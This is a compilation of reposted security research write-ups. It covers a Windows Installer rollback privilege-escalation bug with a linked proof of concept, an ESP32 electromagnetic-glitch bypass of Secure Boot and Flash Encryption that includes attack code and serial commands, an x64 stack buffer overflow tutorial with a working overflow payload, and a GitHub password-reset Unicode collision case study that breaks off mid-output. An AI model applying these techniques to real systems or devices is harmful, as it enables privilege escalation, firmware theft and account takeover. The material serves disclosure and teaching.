Microsoft has patched the issues by checking if c:\config.msi exist, if not it will be used to generate rollback directory otherwise if it exist c:\windows\installer\config.msi will be used as a folder to generate rollback files.

A tweet by sandboxescaper mentioned that if a registry key “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders\C:\Config.Msi” existed when the installation begin, the windows installer will use c:\config.msi as a directory rollback files. As an unprivileged user I guess there’s no way to prevent the deletion or create “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders\C:\Config.Msi”

And as usual there’s always something that worth our attention.

When the directory is deleted, there’s an additional check if the directory exist or not. Which is kinda strange, since the RemoveDirectory returned TRUE

I guess there’s no need to make additional checks. I am pretty sure that there’s a bug there, I managed to create the directory as soon the installer delete and this happened

The installer did a check if the directory exist and it return that the directory exist, so the windows installer won’t delete the registry key  “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders\C:\Config.Msi” because the directory wasn’t delete.

In the next installation the C:\Config.Msi will be used to save rollback files on it, which can be easily abused (I’ve already done that in CVE-2020-1302 and CVE-2020-16902).

I’ve provided a PoC as c++ project to exploit the issue, it’s a double click to SYSTEM shell, thank me later again.

PoC can be found hereNote: I am not responsible for any usage for those disclosures, you’re on your own.

Espressif ESP32: Bypassing Encrypted Secure Boot (CVE-2020-13629)

SP32: Bypassing Encrypted Secure Boot (CVE-2020-13629)

Original text by Raelize

We arrived at the last post about our Fault Injection research on the ESP32. Please read our previous posts as it provides context to the results described in this post.

During our Fault Injection research on the ESP32, we gradually took steps forward in order to identify the required vulnerabilities that allowed us to bypass Secure Boot and Flash Encryption with a single EM glitch. Moreover, we did not only achieve code execution, we also extracted the plain-text flash data from the chip.

Espressif requested a CVE for the attack described in this post: CVE-2020-13629. Please note, that the attack as described in this post, is only applicable to ESP32 silicon revision 0 and 1. The newer ESP32 V3 silicon supports functionality to disable the UART bootloader that we leveraged for the attack.

UART bootloader

The ESP32 implements an UART bootloader in its ROM code. This feature allows, among other functionality, to program the external flash. It’s not uncommon that such functionality is implemented in the ROM code as it’s quite robust as the code cannot get corrupt easily. If this functionality would be implemented by code stored in the external flash, any corruption of the flash may result in a bricked device.

Typically, this type of functionality is accessed by booting the chip in a special boot mode. The boot mode selection is often done using one or more external strap pin(s) which are set before resetting the chip. On the ESP32 it works exactly like this pin G0 which is exposed externally.

The UART bootloader supports many interesting commands that can be used to read/write memory, read/write registers and even execute a stub from SRAM.

Executing arbitrary code

The UART bootloader supports loading and executing arbitrary code using the load_ram command. The ESP32‘s SDK includes all the tooling required to compile the code that can be executed from SRAM. For example, the following code snippet will print SRAM CODE\n on the serial interface.

void __attribute__((noreturn)) call_start_cpu0()
{
    ets_printf("SRAM CODE\n");
    while (1);
}

The esptool.py tool, which is part of the ESP32‘s SDK, can be used to load the compiled binary into the SRAM after which it will be executed.

esptool.py --chip esp32 --no-stub --port COM3 load_ram code.bin

Interestingly, the UART bootloader cannot disabled and therefore always accessible, even when Secure Boot and Flash Encryption are enabled.

Additional measures

Obviously, if no additional security measures would be taken, leaving the UART bootloader always accessible would render Secure Boot and Flash Encryption likely useless. Therefore, Espressif implemented additional security measures which are enabled using dedicated eFuses.

These are security configuration bits implemented in special memory, often referred to as OTP memory, which can typically only change from 0 to 1. This guarantees, that once enabled, is enabled forever. The following OTP memory bits are used to disable specific functionality when the ESP32 is in the UART bootloader boot mode.

  • DISABLE_DL_ENCRYPT: disables flash encryption operation
  • DISABLE_DL_DECRYPT: disables transparent flash decryption
  • DISABLE_DL_CACHE: disables the entire MMU flash cache

The most relevant OTP memory bit is DISABLE_DL_DECRYPT as it disables the transparent decryption of the flash data.

If not set, it would be possible to simply access the plain-text flash data while the ESP32 is in its UART bootloader boot mode.

If set, any access to the flash, when the chip is in UART bootloader boot mode, will yield just the encrypted data. The Flash Encryption feature, which is fully implemented in hardware and transparent to the processor, is only enabled in when the ESP32 is in Normal boot mode.

The attacks described in this post have all these bits set to 1.

Persistent data in SRAM

The SRAM memory that’s used by the ESP32 is typical technology that’s used by many chips. It’s commonly used to the ROM‘s stack and executing the first bootloader from flash. It’s convenient to use at early boot as it typically require no configuration before it can be used.

We know from previous experience that the data stored in SRAM memory is persistent until it’s overwritten or the required power is removed from the physical cells. After a cold reset (i.e. power-cycle) of the chip, the SRAM will be reset to its default state. This often semi-random and unique per chip as the default value for each bit (i.e. 0 or 1) is different.

However, after a warm reset, where the entire chip is reset without removing the power, it may happen that the data stored in SRAM remains unaffected. This persistence of the data is visualized in the picture below.

We decided to figure out if this behavior holds up for the ESP32 as well. We identified that the hardware watchdog can be used to issue a warm reset from software. This watchdog can also be issued when the chip is in UART bootloader boot mode and therefore we can use it to reset the ESP32 back into Normal boot mode.

Using some test code, loaded and executed in SRAM using the UART bootloader, we determined that the data in SRAM is indeed persistent after issuing a warm reset using the watchdog. Effectively this means we can boot the ESP32 in Normal boot mode with the SRAM filled with controlled data.

But… how can we (ab)use this?

Road to failure

We envisioned that we may be able to leverage the persistence of data in SRAM across warm resets for an attack. The first attack we came up with is to fill the SRAM with code using the UART bootloader and issue a warm reset using the watchdog. Then, we inject a glitch while the ROM code is overwriting this code with the flash bootloader during a normal boot.

We got this ideas as during our previous experiments, where we turned data transfers into code execution, we noticed that for some experiments the chip started executing from the entry address before the bootloader was finished copying.

Sometimes you just need to try it…

Attack code

The code that we load into the SRAM using the UART bootloader is shown below.

#define a "addi a6, a6, 1;"
#define t a a a a a a a a a a
#define h t t t t t t t t t t
#define d h h h h h h h h h h

void __attribute__((noreturn)) call_start_cpu0() {
    uint8_t cmd;

    ets_printf("SRAM CODE\n");

    while (1) {

        cmd = 0;
        uart_rx_one_char(&cmd);

        if(cmd == 'A') {                                    // 1
            *(unsigned int *)(0x3ff4808c) = 0x4001f880;
            *(unsigned int *)(0x3ff48090) = 0x00003a98;
            *(unsigned int *)(0x3ff4808c) = 0xc001f880;
        }
    }

    asm volatile ( d );                                     // 2

    "movi a6, 0x40; slli a6, a6, 24;"                       // 3
    "movi a7, 0x00; slli a7, a7, 16;"
    "xor a6, a6, a7;"
    "movi a7, 0x7c; slli a7, a7, 8;"
    "xor a6, a6, a7;"
    "movi a7, 0xf8;"
    "xor a6, a6, a7;"

    "movi a10, 0x52; callx8  a6;" // R
    "movi a10, 0x61; callx8  a6;" // a            
    "movi a10, 0x65; callx8  a6;" // e               
    "movi a10, 0x6C; callx8  a6;" // l               
    "movi a10, 0x69; callx8  a6;" // i               
    "movi a10, 0x7A; callx8  a6;" // z               
    "movi a10, 0x65; callx8  a6;" // e               
    "movi a10, 0x21; callx8  a6;" // !               
    "movi a10, 0x0a; callx8  a6;" // \n               

    while(1);
}

To summarize, the above code implements the following:

  1. Command handler with a single command to perform a watchdog reset
  2. NOP-like padding using addi instructions
  3. Assembly for printing Raelize! on the serial interface

Please note, the listing’s numbers match the numbers in the code.

Timing

We target a reasonably small attack window at the start of F which is shown in the picture below. We know from previous experiments that during this moment the flash bootloader is copied.

The glitch must be injected before our code in SRAM is entirely overwritten by the valid flash bootloader.

Attack cycle

We took the following steps for each experiment to determine if the attack idea actually works. A successful glitch will print Raelize! on the serial interface.

  1. Set pin G0 to low and perform a cold reset to enter UART bootloader boot mode
  2. Use the load_ram command to execute our attack code from SRAM
  3. Send an A to the program to issue a warm reset into normal boot mode
  4. Inject a glitch while the flash bootloader is being copied by the ROM code

Results

After running these experiments for more than a day, resulting in more than 1 million experiments, we did not observe any successful glitch…

An unexpected result

Nonetheless, while analyzing the results, we noticed something unexpected.

The serial interface output for one of the experiments, which is shown below, indicated that the glitch caused an illegal instruction exception.

ets Jun  8 2016 00:22:57
rst:0x10 (RTCWDT_RTC_RESET),boot:0x13 (SPI_FAST_FLASH_BOOT)
configsip: 0, SPIWP:0xee
clk_drv:0x00,q_drv:0x00,d_drv:0x00,cs0_drv:0x00,hd_drv:0x00,wp_drv:0x00
mode:DIO, clock div:2
load:0x3fff0008,len:4
load:0x3fff000c,len:3220
load:0x40078000,len:4816
load:0x40080400,len:18640
entry 0x40080740
Fatal exception (0): IllegalInstruction
epc1=0x661b661b, epc2=0x00000000, epc3=0x00000000, 
excvaddr=0x00000000, depc=0x00000000

These type of exceptions happened quite often when glitches are injected in a chip. This was not different for the ESP32. For most the exceptions the PC register is set to a value that’s expected (i.e. a valid address). It does not happen often the PC register is set to such an interesting value.

The Illegal Instruction exception is caused as there is no valid instruction stored at the 0x661b661b address. We conclude this value must come from somewhere and that is cannot magically end up in the PC register.

We analyzed the code that we load into the SRAM in order to find an explanation. The binary code, of which a snippet is shown below, quickly gave us the answer we were looking for. The value 0x661b661b is easily identified in the above binary image. It actually represents two addi a6, a6, 1 instructions of which we implemented 1000 in our test code.

00000000  e9 02 02 10 28 04 08 40  ee 00 00 00 00 00 00 00  |....(..@........|
00000010  00 00 00 00 00 00 00 01  00 00 ff 3f 0c 00 00 00  |...........?....|
00000020  53 52 41 4d 20 43 4f 44  45 0a 00 00 00 04 08 40  |SRAM CODE......@|
00000030  50 09 00 00 00 00 ff 3f  04 04 fe 3f 4d 04 08 40  |P......?...?M..@|
00000040  00 04 fe 3f 8c 80 f4 3f  90 80 f4 3f 98 3a 00 00  |...?...?...?.:..|
00000050  80 f8 01 c0 54 7d 00 40  d0 92 00 40 36 61 00 a1  |....T}.@...@6a..|
00000060  f5 ff 81 fc ff e0 08 00  0c 08 82 41 00 ad 01 81  |...........A....|
00000070  fa ff e0 08 00 82 01 00  4c 19 97 98 1f 81 ef ff  |........L.......|
00000080  91 ee ff 89 09 91 ee ff  89 09 91 f0 ff 81 ee ff  |................|
00000090  99 08 91 ef ff 81 eb ff  99 08 86 f2 ff 5c a9 97  |.............\..|
000000a0  98 c5 1b 66 1b 66 1b 66  1b 66 1b 66 1b 66 3e 0c  |...f.f.f.f.f.f>.|
000000b0  1b 66 1b 66 1b 66 1b 66  1b 66 1b 66 1b 66 1b 66  |.f.f.f.f.f.f.f.f|
000000c0  1b 66 1b 66 1b 66 1b 66  1b 66 1b 66 1b 66 1b 66  |.f.f.f.f.f.f.f.f|
000000d0  1b 66 1b 66 1b 66 1b 66  1b 66 1b 66 1b 66 1b 66  |.f.f.f.f.f.f.f.f|
...
00000330  1b 66 1b 66 1b 66 1b 66  1b 66 1b 66 1b 66 1b 66  |.f.f.f.f.f.f.f.f|
00000340  1b 66 1b 66 1b 66 1b 66  1b 66 1b 66 1b 66 1b 66  |.f.f.f.f.f.f.f.f|
00000350  1b 66 1b 66 1b 66 1b 66  1b 66 1b 66 1b 66 1b 66  |.f.f.f.f.f.f.f.f|

We just use these instructions as NOPs in order to create a landing zone in a similar fashion a NOP-sled is often used in software exploits. We did not anticipate these instructions would end up in the PC register.

Of course, we did not mind either. We concluded that, we are able to load data from SRAM into the PC register when we inject a glitch while the flash bootloader is being copied by the ROM code .

We quickly realized, we now have all the ingredients to cook up an attack where we bypass Secure Boot and Flash Encryption using a single glitch. We reused some of the knowledge obtained during a previously described attack where we take control of the PC register.

Road to success

We reused most of the code that we previously loaded into SRAM using the UART bootloader. Only the payload (i.e. printing) that we intended to execute is removed as our strategy is now to set the PC register to an arbitrary value in order to take control.

#define a "addi a6, a6, 1;"
#define t a a a a a a a a a a
#define h t t t t t t t t t t
#define d h h h h h h h h h h

void __attribute__((noreturn)) call_start_cpu0() {
    uint8_t cmd;
   
    ets_printf("SRAM CODE\n");

    while (1) {

        cmd = 0;
        uart_rx_one_char(&cmd);

        if(cmd == 'A') {
            *(unsigned int *)(0x3ff4808c) = 0x4001f880;
            *(unsigned int *)(0x3ff48090) = 0x00003a98;
            *(unsigned int *)(0x3ff4808c) = 0xc001f880;
        }
    }

    asm volatile ( d );

    while(1);
}

After compiling the above code, we overwrite directly in the binary the addi instructions with the address pointer 0x4005a980. This address points to a function in the ROM code that prints something on the serial interface. This allows us to identify when we are successful.

We fixed the glitch parameters to that of the experiment that caused the Illegal Instruction exception. After a short while, we successfully identified several experiments during which the address pointer is loaded into the PC register. Effectively this provides us with control of the PC register and we can likely achieve arbitrary code execution.

Why does this work?

Good question. Not so easy to answer.

Unfortunately, we do not have a sound answer for you. We definitely did not anticipate that controlling the data at the destination could yield control of the PC register. We came up with a few possibilities, but we cannot say with full confidence if any of these is actually correct.

One explanation is that the glitch may corrupt both operands of the ldr instruction in order to load a value from the destination into the a0. This is similar as the previously described attack where we control PC indirectly by controlling the source data.

Moreover, it’s a possibility that the ROM code implements functionality that facilitates this attack. In other words, we may execute valid code within the ROM due to our glitch that causes the value from SRAM to be loaded into the PC register.

More thorough investigation is required in order to determine what exactly allows us to perform this attack. However, from an attacker’s perspective, it’s sufficient to realize how to get control of PC in order to build the exploit.

Extracting plain-text data

Even though we have control of the PC register, we are not yet able to extract the plain-text data from the flash. We decided to leverage the UART bootloader functionality to do so.

We decided to jump directly to the UART bootloader while the chip is in Normal boot mode. For this attack we overwrite the addi instructions in the code that we load into SRAM with address pointers to the start of the UART bootloader (0x0x40007a19).

The UART bootloader prints a string on the serial interface which is shown below. We can use this to identify if we are successful or not.

waiting for download\n"

Once we observe a successful experiment, we can simply use the esptool.py to issue a read_mem command in order to access plain-text flash data. The command below reads 4 bytes from the address where the external flash is mapped (0x3f400000).

esptool.py --no-stub --before no_reset --after no_reset read_mem 0x3f400000

Unfortunately, this did not work. For some reason the processor is replying with 0xbad00bad which is an indication we read from an unmapped page.

esptool.py v2.8
Serial port COM8
Connecting....
Detecting chip type... ESP32
Chip is ESP32D0WDQ6 (revision 1)
Crystal is 40MHz
MAC: 24:6f:28:24:75:08
Enabling default SPI flash mode...
0x3f400000 = 0xbad00bad
Staying in bootloader.

We noticed that there is quite some configuration done at the start of the UART bootloader. We assume it may affect the MMU as well.

Just to try something different, we decided to jump directly to the command handler of the UART bootloader itself (0x40007a4e). Once in the hander, we can send a raw read_mem command directly on the serial interface which is shown below.

target.write(b'\xc0\x00\x0a\x04\x00\x00\x00\x00\x00\x00\x00\x40\x3f\xc0')

Unfortunately, by jumping directly to the handler, the string that’s printed (i.e. waiting for download\n") is not printed anymore. Therefore, we cannot easily identify successful experiments. Therefore, we decided to simply always send the command, regardless if we are successful or not. We used a very short serial interface timeout in order to minimize the overhead of almost always hitting the timeout.

After a short while, we observed the first successful experiments!

Conclusion

In this post we described an attack on the ESP32 where we bypass its Secure Boot and Flash Encryption features using a single EM glitch. Moreover, we leveraged the vulnerability exploited by this attack to extract the plain-text data from the encrypted flash.

We can use FIRM to break down the attack in multiple comprehensible stages.

Interestingly, two weaknesses of the ESP32 facilitated this attack. First, the UART bootloader cannot be disabled and is always accessible. Second, the data loaded in SRAM is persistent across warm resets and can therefore be filled with arbitrary data using UART bootloader.

Espressif indicated in their advisory related to this attack that newer versions of the ESP32 include functionality to completely disable this feature.

Final thoughts

All standard embedded technologies are vulnerable to Fault Injection attacks. Therefore, it’s not surprising at all that the ESP32 is vulnerable as well. These type of chips are simply not made to be resilient against these type of attacks. However, and this is important, this does not mean that these attacks do not impose a risk.

Our research has shown that leveraging chip-level weaknesses for Fault Injection attack is very effective. We have not seen many public examples yet as most attack still focus on traditional approaches where the focus is mostly on bypassing just a check.

We believe the full potential of Fault Injection attacks is still unexplored. Most research until recently focused mostly on the injection method itself (i.e. ActivateInject and Glitch) compared to what can be accomplished due to a vulnerable chip (i.e. FaultExploit and Goal).

We are confident that creative usage of new and undefined fault models, will give rise to unforeseen attacks, where exciting exploitation strategies are used, for a wide variety of different goals.

Stack Based Buffer Overflows on x64 (Windows)

Original text by nytrosecurity

The previous two blog posts describe how a Stack Based Buffer Overflow vulnerability works on x86 (32 bits) Windows. In the first part, you can find a short introduction to x86 Assembly and how the stack works, and on the second part you can understand this vulnerability and find out how to exploit it.

This article will present a similar approach in order to understand how it is possible to exploit this vulnerability on x64 (64 bits) Windows. First part will cover the differences in the Assembly code between x86 and x64 and the different function calling convention, and the second part will detail how these vulnerabilities can be exploited.

ASM for x64

There are multiple differences in Assembly that need to be understood in order to proceed. Here we will talk about the most important changes between x86 and x64 related to what we are going to do.

First of all, the registers are now the following:

  • The general purpose registers are the following: RAX, RBX, RCX, RDX, RSI, RDI, RBP and RSP. They are now 64 bit (8 bytes) instead of 32 bits (4 bytes).
  • The EAX, EBX, ECX, EDX, ESI, EDI, EBP, ESP represent the last 4 bytes of the previously mentioned registers. They hold 32 bits of data.
  • There are a few new registers: R8, R9, R10, R11, R12, R13, R14, R15, also holding 64 bits.
  • It is possible to use R8d, R9d etc. in order to access the last 4 bytes, as you can do it with EAX, EBX etc.
  • Pushing and poping data on the stack will use 64 bits instead of 32 bits

Calling convention

Another important difference is the way functions are called, the calling convention.

Here are the most important things we need to know:

  • First 4 parameters are not placed on the stack. First 4 parameters are specified in the RCX, RDX, R8 and R9 registers.
  • If there are more than 4 parameters, the other parameters are placed on the stack, from left to right.
  • Similar to x86, the return value will be available in the RAX register.
  • The function caller will allocate stack space for the arguments used in registers (called “shadow space” or “home space”). Even if when a function is called the parameters are placed in registers, if the called function needs to modify the registers, it will need some space to store them, and this space will be the stack. The function caller will have to allocate this space before the function call and to deallocate it after the function call. The function caller should allocate at least 32 bytes (for the 4 registers), even if they are not all used.
  • The stack has to be 16 bytes aligned before any call instruction. Some functions might allocate 40 (0x28) bytes on the stack (32 bytes for the 4 registers and 8 bytes to align the stack from previous usage – the return RIP address pushed on the stack) for this purpose. You can find more details here.
  • Some registers are volatile and other are nonvolatile. This means that if we set some values into a register and call some function (e.g. Windows API) the volatile register will probably change while nonvolatile register will preserve their values.

More details about calling convention on Windows can be found here.

Function calling example

Let’s take a simple example in order to understand those things. Below is a function that does a simple addition, and it is called from main.

#include "stdafx.h"

int Add(long x, int y)
{
    int z = x + y;
    return z;
}

int main()
{
    Add(3, 4);
    return 0;
}

Here is a possible output, after removing all optimisations and security features.

Main function:

sub rsp,28
mov edx,4
mov ecx,3
call <consolex64.Add>
xor eax,eax
add rsp,28
ret

We can see the following:

  1. sub rsp,28 – This will allocate 0x28 (40) bytes on the stack, as we previously discussed: 32 bytes for the register arguments and 8 bytes for alignment.
  2. mov edx,4 – This will place in EDX register the second parameter. Since the number is small, there is no need to use RDX, the result is the same.
  3. mov ecx,3 – The value of the first argument is place in ECX register.
  4. call <consolex64.Add> – Call the “Add” function.
  5. xor eax,eax – Set EAX (or RAX) to 0, as it will be the return value of main.
  6. add rsp,28 – Clears the allocated stack space.
  7. ret – Return from main.

Add function:

mov dword ptr ss:[rsp+10],edx
mov dword ptr ss:[rsp+8],ecx
sub rsp,18
mov eax,dword ptr ss:[rsp+28]
mov ecx,dword ptr ss:[rsp+20]
add ecx,eax
mov eax,ecx
mov dword ptr ss:[rsp],eax
mov eax,dword ptr ss:[rsp]
add rsp,18
ret

Let’s see how this function works:

  1. mov dword ptr ss:[rsp+10],edx – As we know, the arguments are passed in ECX and EDX registers. But what if the function needs to use those registers (however, please note that some registers must be preserved by a function call, these registers are the following: RBX, RBP, RDI, RSI, R12, R13, R14 and R15)? In this case, the function will use the “shadow space” (“home space”) allocated by the function caller. With this instruction, the function saves on the shadow space the second argument (the value 4), from EDX register.
  2. mov dword ptr ss:[rsp+8],ecx – Similar to the previous instruction, this one will save on the stack the first argument (value 3) from the ECX register
  3. sub rsp,18 – Allocate 0x18 (or 24) bytes on the stack. This function does not call other function, so it is not needed to allocate at least 32 bytes. Also, since it does not call other functions, it is not required to align the stack to 16 bytes. I am not sure why it allocates 24 bytes, it looks like the “local variables area” on the stack has to be aligned to 16 bytes and the other 8 bytes might be used for the stack alignment (as previously mentioned).
  4. mov eax,dword ptr ss:[rsp+28] – Will place in EAX register the value of the second parameter (value 4).
  5. mov ecx,dword ptr ss:[rsp+20] – Will place in ECX register the value of the first parameter (value 3).
  6. add ecx,eax – Will add to ECX the value of the EAX register, so ECX will become 7.
  7. mov eax,ecx – Will save the same value (the sum) into EAX register.
  8. mov dword ptr ss:[rsp],eax and mov eax,dword ptr ss:[rsp] look like they are some effects of the removed optimizations, they don’t do anything useful.
  9. add rsp,18 – Cleanup the allocated stack space.
  10. ret – Return from the function.

Exploitation

Let’s see now how it would be possible to exploit a Stack Based Buffer Overflow on x64. The idea is similar to x86: we overwrite the stack until we overwrite the return address. At that point we can control program execution. This is the easiest example to understand this vulnerability.

We will have a simple program, such as this one:

void Copy(const char *p)
{
    char buffer[40];
    strcpy(buffer, p);
}

int main()
{
    Copy("Test");
    return 0;
}

We have a 40 bytes buffer and a function that will copy some string on that buffer.

This will be the assembly code of the main function:

sub rsp,28                       ; Allocate space on the stack
lea rcx,qword ptr ds:[1400021F0] ; Put in RCX the string ("test")
call <consolex64.Copy>           ; Call the Copy function
xor eax,eax                      ; EAX = 0, return value
add rsp,28                       ; Cleanup the stack space
ret                              ; return

And this will be the assembly code for the Copy function:

mov qword ptr ss:[rsp+8],rcx  ; Save the RCX on the stack
sub rsp,58                    ; Allocate space on the stack
mov rdx,qword ptr ss:[rsp+60] ; Put in RDX the "Test" string (second parameter to strcpy)
lea rcx,qword ptr ss:[rsp+20] ; Put in RCX the buffer (first parameter to strcpy)
call <consolex64.strcpy>      ; Call strcpy function
add rsp,58                    ; Cleanup the stack
ret                           ; Return from function

Let’s modify the Copy function call to the following:

Copy("1111111122222222333333334444444455555555");

The string has 40 bytes, and it will fit in our buffer (however, please not that strcpy will also place a NULL byte after our string, but this way it is easier to see the buffer on the stack).

This is how the stack will look like after the strcpy function call:

000000000012FE90 000007FEEE7E5D98 ; Unused stack space
000000000012FE98 00000001400021C8 ; Unused stack space
000000000012FEA0 0000000000000000 ; Unused stack space
000000000012FEA8 00000001400021C8 ; Unused stack space
000000000012FEB0 3131313131313131 ; "11111111"
000000000012FEB8 3232323232323232 ; "22222222"
000000000012FEC0 3333333333333333 ; "33333333"
000000000012FEC8 3434343434343434 ; "44444444"
000000000012FED0 3535353535353535 ; "55555555"
000000000012FED8 0000000000000000 ; Unused stack space
000000000012FEE0 00000001400021A0 ; Unused stack space
000000000012FEE8 0000000140001030 ; Return address

As you can probably see, we need to add extra 24 bytes to overwrite the return address: 16 bytes the unused stack space and 8 bytes for the return address. Let’s modify the Copy function call to the following:

Copy("11111111222222223333333344444444555555556666666677777777AAAAAAAA");

This will overwrite the return address with “AAAAAAAA”.

NULL byte problem

In our case, a call to “strcpy” function will generate the vulnerability. What is important to understand, is that “strcpy” function will stop copying data when it will encounter first NULL byte. For us, this means that we cannot have NULL bytes in our payload.

This is a problem for a simple reason: the addresses that we might use contain NULL bytes. For example, these are the addresses in my case:

0000000140001000 | 48 89 4C 24 08 | mov qword ptr ss:[rsp+8],rcx 
0000000140001005 | 48 83 EC 58    | sub rsp,58 
0000000140001009 | 48 8B 54 24 60 | mov rdx,qword ptr ss:[rsp+60] 
000000014000100E | 48 8D 4C 24 20 | lea rcx,qword ptr ss:[rsp+20] 
0000000140001013 | E8 04 0B 00 00 | call <consolex64.strcpy>
0000000140001018 | 48 83 C4 58    | add rsp,58 
000000014000101C | C3             | ret

If we would like to proceed like in the 32 bits example, we would have to overwrite the return address to an address such as 000000014000101C where there would be a “JMP RSP” instruction, and continue with our shellcode after this address. As you can see, this is not possible, because the address contains NULL bytes.

So, what can we do? We should find a workaround. A simple and useful trick that we can do is the following: we can partially overwrite the return address. So, instead of overwriting the whole 8 bytes of the address, we can overwrite only the last 4, 5 or 6 bytes. Let’s modify the function call to overwrite only the last 5 bytes, so we will just remove 3 “A”s from our payload. The function call will be the following:

Copy("11111111222222223333333344444444555555556666666677777777AAAAA");

Before the “RET” instruction, the stack will look like this:

000000000012FED8 3636363636363636 ; Part of our payload
000000000012FEE0 3737373737373737 ; Part of our payload
000000000012FEE8 0000004141414141 ; Return address

As you can see, we are able to specify a valid address, so we solved our first issue. However, since we cannot add anything else after this, as we need NULL bytes to have a valid address, how can we exploit this vulnerability?

Let’s take a look at the registers, maybe we can find an easy win. Here are the registers before the RET instruction:

Win64 registers

We can see that in the RAX register we can find the address where our payload is stored. This happens for a simple reason: strcpy function will copy the string to the buffer and it will return the address of the buffer. As we already know, the returned data from a function call will be saved in RAX register, so we will have access to our payload using RAX register.

Now, our exploitation is simple:

  1. We have our payload address in RAX register
  2. We find a “JMP RAX” instruction
  3. We specify the address of that instruction as return address

We can easily find some “JMP RAX” instructions:

JMP RAX

We will take one of them, one that does not contain NULL bytes in the middle, and we can create the payload:

  1. 56 bytes of shellcode (required to reach the return address). We will use 0xCC (the INT 3 instruction, which is used to pause the execution of the program in the debugger)
  2. 4 bytes of return address, the “JMP RAX” instruction that we previously found

This is how the function call will look like:

 Copy("\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC"
      "\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC"
      "\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC"
      "\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC"
      "\xF8\x0E\x7E\x77");

And we have control over the program.

However, please note that we have a small buffer and it might be difficult to find a good shellcode to fit in this space. However, the purpose of the article was to find some way to exploit this vulnerability in a way that can be easily understood.

Conclusion

Maybe this article did not cover a real-life situation, but it should be enough as a starting point in exploiting Stack Based Buffer Overflows on Windows 64 bits.

My recommendation is to compile yourself a program like this one and try to exploit it yourself. You can download my simple Visual Studio 2017 project from here.

Case Study : Exploiting a Business Logic Flaw with GitHub’s Forgot Password workflow (discovered by John Gracey)

Original text by Chetan Conikee

John Gracey of Wisdom published a very interesting business logic flaw in GitHub’s reset password workflow on November 28th, 2019. It was acknowledged and fixed by GitHub’s security team. If not mitigated, this flaw can lead to account takeover vulnerability (specifically for accounts with 2FA not enabled).

From ASCII to Unicode

ASCII (American Standard Code for Information Interchange) had became the first widespread encoding scheme. However, it was limited to only 128 character definitions. This was fine for the most common English characters, numbers, and punctuation, but slowly became limiting for the rest of the world.

Naturally, the rest of the world wanted the same encoding scheme for their characters too, which was why the Unicode standard was created. The objective of Unicode was to unify all the different encoding schemes so that the confusion between computers can be limited as much as possible.

As John Gracey points out, developer understanding of unicode is often limited to internationalization and hence fail to grok details associated with unicode points and units. This lack of understanding could lead to an inherent vulnerability called Unicode Case Mapping Collision.

Loosely speaking, a collision occurs when two different characters are uppercased or lowercased into the same character. This effect is found commonly at the boundary between two different protocols, like email and domain names.

~ John Gracey

On November 24th 2019, GetWisdom had published an exhaustive list of case mapping collisions with english alphabets here . Following this article, John published a detailed case study of the logic flaw here. I’d recommend for you all to read John’s post in detail before you proceed further.

Hacking Unicode Case Mapping Collision

Let us attempt to emulate this business logic workflow associated with resetPassword functionality

  1. Attacker enumerates with a unicode character embedded in local part of email address (not domain part). For example:`jıll@service.com`
  2. Attacker clicks forgot-password and types the email (for example: `jıll@service.com` where `ı` is the unicode character)
  3. The business logic supporting forgot-password function receives the attacker controlled email address and case-folds (toLowerCase) as a part of sanitization practice. This case folding transformation leads to a Unicode Case Mapping Collision which fundamentally transforms the identity to another user’s email address — `jıll@service.com` with a unicode `ı` is transformed into `jill@service.com` due to case mapping collision.
  4. Of course, the validation passes leading to next step of creating a reset link and dispatching an email to address specified via request (which is attacker controlled) and NOT to email-address associated with registered account (retrieved after validating identity).

Let us use this sample spring-boot based application (forked and revised) with forgot password functionality that emulates both a best and worse scenario associated with this logic flaw.conikeec/spring-security-registrationIf you’re already a student of Learn Spring Security, you can get started diving deeper into registration with Module 2…github.com

Refer to controller logic supporting password reset here (with all symptoms that can lead to an exploit)

  1. Attacker enumerates Forgot Password function in SaaS service with an embedded unicode character.
  2. Attacker controlled userEmail parameter is injected into the resetPasswordBad controller routine.
  3. Validation function findUserByEmailaccepts attacker controlled email address that is transformed (via caseFolding) and passes validation condition (if registered user exists).
  4. Email with reset password link is now sent to to address specified via request (which is attacker controlled) and NOT to email-address associated with registered account (retrieved after validating identity).

Automated verification of Business Logic flaws in source code

Let’s fire up ShiftLeft’s Ocular query engine and trace through information flows in order identify all of these missteps leading to this Business Logic Flaw.

git clone git@github.com:conikeec/spring-security-registration.git

cd spring-security-registration

//compile and create package artifact
mvn -Dmaven.test.skip=true clean package

// Download trial distribution of Ocular (https://ocular.shiftleft.io). Install and thereafter fire up the prompt to commence investigation

./ocular.sh

createCpgAndSp("/Users/chetanconikee/pgithub/spring-security-registration/target/spring-security-login-and-registration.war")


//retrieve controller mapped to resetPassword route
case class RouteMapping(routeName : String, backingController : String)
val attackSurface = cpg.annotation.name("RequestMapping").map(x =&gt;
    RouteMapping(x.start.parameterAssign.value.code.l.head, x.start.method.fullName.l.head)
).l

//output
attackSurface: List[RouteMapping] = List(
  RouteMapping(
    "[\"/user/updatePassword\"]",
    "org.baeldung.web.controller.RegistrationController.changeUserPassword:org.baeldung.web.util.GenericResponse(java.util.Locale,org.baeldung.web.dto.PasswordDto)"
  ),
  RouteMapping(
    "[\"/user/changePassword\"]",
    "org.baeldung.web.controller.RegistrationController.showChangePasswordPage:java.lang.String(java.util.Locale,org.springframework.ui.Model,long,java.lang.String)"
  ),
  RouteMapping(
    "[\"/registrationConfirm\"]",
    "org.baeldung.web.controller.RegistrationController.confirmRegistration:java.lang.String(javax.servlet.http.HttpServletRequest,org.springframework.ui.Model,java.lang.String)"
  ),
  RouteMapping(
    "[\"/loggedUsersFromSessionRegistry\"]",
    "org.baeldung.web.controller.UserController.getLoggedUsersFromSessionRegistry:java.lang.String(java.util.Locale,org.springframework.ui.Model)"
  ),
  RouteMapping(
    "[\"/user/resendRegistrationToken\"]",
    "org.baeldung.web.controller.RegistrationController.resendRegistrationToken:org.baeldung.web.util.GenericResponse(javax.servlet.http.HttpServletRequest,java.lang.String)"
  ),
  RouteMapping(
